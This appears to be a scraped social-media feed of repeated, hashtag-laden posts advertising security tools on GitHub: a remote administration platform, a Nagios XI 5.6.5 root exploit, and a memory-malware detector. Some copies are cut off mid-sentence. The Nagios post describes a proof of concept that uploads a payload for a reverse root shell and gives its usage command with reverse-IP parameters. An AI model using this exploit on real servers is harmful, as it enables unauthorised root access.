Sandpolis:-- #Ultimate #Remote #Management #utility.
#Sandpolis is a remote administration platform for #servers, #desktop #computers, and anything in-between.
Sandpolis is designed for #sysadmins and #enthusiasts but can be used by anyone once set up. Most users will use Sandpolis via the #JavaFX desktop application or the #iOS #mobile #application.
⚡️Sandpolis is unfinished and therefore should only be used in a #secure #testing environment! ⚡️
Here are some fundamental objectives that Sandpolis tries to achieve:-
1. compatible with as many operating systems as possible
2. #flexible, configurable, and easily extensible to niche applications via #plugins
3. uncompromising on #performance and #security
4. low latency and high concurrency
5. user-friendly
#Download #Link:-
https://github.com/Subterranean-Security/Sandpolis
Sandpolis:-- #Ultimate #Remote #Management #utility.
#Sandpolis is a remote administration platform for #servers, #desktop #computers, and anything in-between.
Sandpolis is designed for #sysadmins and #enthusiasts but can be used by anyone once set up. Most users will use Sandpolis via the #JavaFX desktop application or the #iOS #mobile #application.
⚡️Sandpolis is unfinished and therefore should only be used in a #secure #testing environment! ⚡️
Here are some fundamental objectives that Sandpolis tries to achieve:-
1. compatible with as many operating systems as possible
2. #flexible, configurable, and easily extensible to niche applications via #plugins
3. uncompromising on #performance and #security
4. low latency and high concurrency
5. user-friendly
#Download #Link:-
https://github.com/Subterranean-Security/Sandpolis
#Sandpolis is a remote administration platform for #servers, #desktop #computers, and anything in-between.
Sandpolis is designed for #sysadmins and #enthusiasts but can be used by anyone once set up. Most users will use Sandpolis via the #JavaFX desktop application or the #iOS #mobile #application.
⚡️Sandpolis is unfinished and therefore should only be used in a #secure #testing environment! ⚡️
Here are some fundamental objectives that Sandpolis tries to achieve:-
1. compatible with as many operating systems as possible
2. #flexible, configurable, and easily extensible to niche applications via #plugins
3. uncompromising on #performance and #security
4. low latency and high concurrency
5. user-friendly
#Download #Link:-
https://github.com/Subterranean-Security/Sandpolis
Sandpolis:-- #Ultimate #Remote #Management #utility.
#Sandpolis is a remote administration platform for #servers, #desktop #computers, and anything in-between.
Sandpolis is designed for #sysadmins and #enthusiasts but can be used by anyone once set up. Most users will use Sandpolis via the #JavaFX desktop application or the #iOS #mobile #application.
⚡️Sandpolis is unfinished and therefore should only be used in a #secure #testing environment! ⚡️
Here are some fundamental objectives that Sandpolis tries to achieve:-
1. compatible with as many operating systems as possible
2. #flexible, configurable, and easily extensible to niche applications via #plugins
3. uncompromising on #performance and #security
4. low latency and high concurrency
5. user-friendly
#Download #Link:-
https://github.com/Subterranean-Security/Sandpolis
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI
Photos from National Cyber Security Services's post
Memhunter:-- Live #Hunting Of #Code #Injection #Techniques.
Memhunter is an endpoint sensor tool that is specialized in detecing resident #malware, improving the threat hunter analysis process and remediation times. The tool detects and reports memory-resident malware living on endpoint processes. Memhunter detects known #malicious #memory injection techniques. The detection #process is performed through live analysis and without needing memory dumps. The tool was designed as a replacement for memory #forensic #volatility #plugins such as malfind and hollowfind. The idea of not requiring memory dumps helps on performing the memory-resident malware threat hunting at scale, without manual #analysis, and without the complex #infrastructure needed to move dumps to forensic environments.
#Download #Link:-
https://github.com/marcosd4h/memhunter
Memhunter:-- Live #Hunting Of #Code #Injection #Techniques.
Memhunter is an endpoint sensor tool that is specialized in detecing resident #malware, improving the threat hunter analysis process and remediation times. The tool detects and reports memory-resident malware living on endpoint processes. Memhunter detects known #malicious #memory injection techniques. The detection #process is performed through live analysis and without needing memory dumps. The tool was designed as a replacement for memory #forensic #volatility #plugins such as malfind and hollowfind. The idea of not requiring memory dumps helps on performing the memory-resident malware threat hunting at scale, without manual #analysis, and without the complex #infrastructure needed to move dumps to forensic environments.
#Download #Link:-
https://github.com/marcosd4h/memhunter